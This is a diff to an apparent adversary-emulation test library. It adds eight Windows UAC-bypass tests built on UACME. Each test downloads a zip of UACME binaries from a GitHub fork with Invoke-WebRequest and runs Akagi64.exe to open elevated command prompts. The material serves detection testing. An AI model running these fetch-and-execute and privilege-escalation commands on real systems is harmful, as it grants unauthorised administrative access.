+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
+    - name: UACME Bypass Method 34
+      auto_generated_guid: 695b2dac-423e-448e-b6ef-5b88e93011d6
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        James Forshaw\n\nType:\tShell API\n\nMethod: Environment variables expansion\n\nTarget:\t\\system32\\svchost.exe
+        via \\system32\\schtasks.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDiskCleanupEnvironmentVariable\n\nUCM
+        Method:\tUacMethodDiskSilentCleanup\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\34 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
+    - name: UACME Bypass Method 39
+      auto_generated_guid: 56163687-081f-47da-bb9c-7b231c5585cf
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        Stefan Kanthak\n\nType:\tDll Hijack\n\nMethod: .NET Code Profiler\n\nTarget:\t\\system32\\mmc.exe\n\nComponent:\tAttacker
+        defined\n\nImplementation:\tucmCorProfilerMethod\n\nUCM Method:\tUacMethodCorProfiler\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\39 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
+    - name: UACME Bypass Method 56
+      auto_generated_guid: 235ec031-cd2d-465d-a7ae-68bab281e80e
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        Hashim Jawad\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\WSReset.exe\n\nComponent:\tAttacker
+        defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodShellWSReset\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\56 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
+    - name: UACME Bypass Method 59
+      auto_generated_guid: dfb1b667-4bb8-4a63-a85e-29936ea75f29
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        James Forshaw\n\nType:\tAppInfo ALPC\n\nMethod: RAiLaunchAdminProcess and
+        DebugObject\n\nTarget:\tAttacker defined\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDebugObjectMethod\n\nUCM
+        Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\59 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
+    - name: UACME Bypass Method 61
+      auto_generated_guid: 7825b576-744c-4555-856d-caf3460dc236
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        Enigma0x3/bytecode77 derivative by Nassim Asrir\n\nType:\tShell API\n\nMethod:
+        Registry key manipulation\n\nTarget:\t\\system32\\slui.exe, \\system32\\changepk.exe\n\nComponent:\tAttacker
+        defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\61 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
   T1218.003:
     technique:
       external_references:

atomics/T1548.002/T1548.002.md

@@ -30,6 +30,22 @@ Another bypass is possible through some lateral movement techniques if credentia
 
 - [Atomic Test #9 - Bypass UAC using SilentCleanup task](#atomic-test-9---bypass-uac-using-silentcleanup-task)
 
+- [Atomic Test #10 - UACME Bypass Method 23](#atomic-test-10---uacme-bypass-method-23)
+
+- [Atomic Test #11 - UACME Bypass Method 31](#atomic-test-11---uacme-bypass-method-31)
+
+- [Atomic Test #12 - UACME Bypass Method 33](#atomic-test-12---uacme-bypass-method-33)
+
+- [Atomic Test #13 - UACME Bypass Method 34](#atomic-test-13---uacme-bypass-method-34)
+
+- [Atomic Test #14 - UACME Bypass Method 39](#atomic-test-14---uacme-bypass-method-39)
+
+- [Atomic Test #15 - UACME Bypass Method 56](#atomic-test-15---uacme-bypass-method-56)
+
+- [Atomic Test #16 - UACME Bypass Method 59](#atomic-test-16---uacme-bypass-method-59)
+
+- [Atomic Test #17 - UACME Bypass Method 61](#atomic-test-17---uacme-bypass-method-61)
+
 
 <br/>
 
@@ -391,4 +407,564 @@ REM will tell it to ignore everything after %windir% and treat it just as a NOTE
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #10 - UACME Bypass Method 23
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: Leo Davidson derivative
+
+Type:	Dll Hijack
+
+Method: IFileOperation
+
+Target:	\system32\pkgmgr.exe
+
+Component: DismCore.dll
+
+Implementation:	ucmDismMethod
+
+UCM Method:	UacMethodDISM
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8ceab7a2-563a-47d2-b5ba-0995211128d7
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%&#92;uacme&#92;23 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #11 - UACME Bypass Method 31
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: Enigma0x3
+
+Type:	Shell API
+
+Method: Registry key manipulation
+
+Target:	\system32\sdclt.exe
+
+Component: Attacker defined
+
+Implementation:	ucmSdcltIsolatedCommandMethod
+
+UCM Method:	UacMethodShellSdclt
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b0f76240-9f33-4d34-90e8-3a7d501beb15
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%&#92;uacme&#92;31 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - UACME Bypass Method 33
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: winscripting.blog
+
+Type:	Shell API
+
+Method: Registry key manipulation
+
+Target:	\system32\fodhelper.exe
+
+Component:	Attacker defined
+
+Implementation:	ucmShellRegModMethod
+
+UCM Method:	UacMethodMsSettings2
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e514bb03-f71c-4b22-9092-9f961ec6fb03
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%&#92;uacme&#92;33 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #13 - UACME Bypass Method 34
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: James Forshaw
+
+Type:	Shell API
+
+Method: Environment variables expansion
+
+Target:	\system32\svchost.exe via \system32\schtasks.exe
+
+Component:	Attacker defined
+
+Implementation:	ucmDiskCleanupEnvironmentVariable
+
+UCM Method:	UacMethodDiskSilentCleanup
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 695b2dac-423e-448e-b6ef-5b88e93011d6
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%&#92;uacme&#92;34 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #14 - UACME Bypass Method 39
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: Stefan Kanthak
+
+Type:	Dll Hijack
+
+Method: .NET Code Profiler
+
+Target:	\system32\mmc.exe
+
+Component:	Attacker defined
+
+Implementation:	ucmCorProfilerMethod
+
+UCM Method:	UacMethodCorProfiler
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 56163687-081f-47da-bb9c-7b231c5585cf
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%&#92;uacme&#92;39 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #15 - UACME Bypass Method 56
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: Hashim Jawad
+
+Type:	Shell API
+
+Method: Registry key manipulation
+
+Target:	\system32\WSReset.exe
+
+Component:	Attacker defined
+
+Implementation:	ucmShellRegModMethod
+
+UCM Method:	UacMethodShellWSReset
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 235ec031-cd2d-465d-a7ae-68bab281e80e
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%&#92;uacme&#92;56 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #16 - UACME Bypass Method 59
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: James Forshaw
+
+Type:	AppInfo ALPC
+
+Method: RAiLaunchAdminProcess and DebugObject
+
+Target:	Attacker defined
+
+Component:	Attacker defined
+
+Implementation:	ucmDebugObjectMethod
+
+UCM Method:	UacMethodDebugObject
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** dfb1b667-4bb8-4a63-a85e-29936ea75f29
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%&#92;uacme&#92;59 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #17 - UACME Bypass Method 61
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: Enigma0x3/bytecode77 derivative by Nassim Asrir
+
+Type:	Shell API
+
+Method: Registry key manipulation
+
+Target:	\system32\slui.exe, \system32\changepk.exe
+
+Component:	Attacker defined
+
+Implementation:	ucmShellRegModMethod
+
+UCM Method:	UacMethodDebugObject
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7825b576-744c-4555-856d-caf3460dc236
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%&#92;uacme&#92;61 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+
 <br/>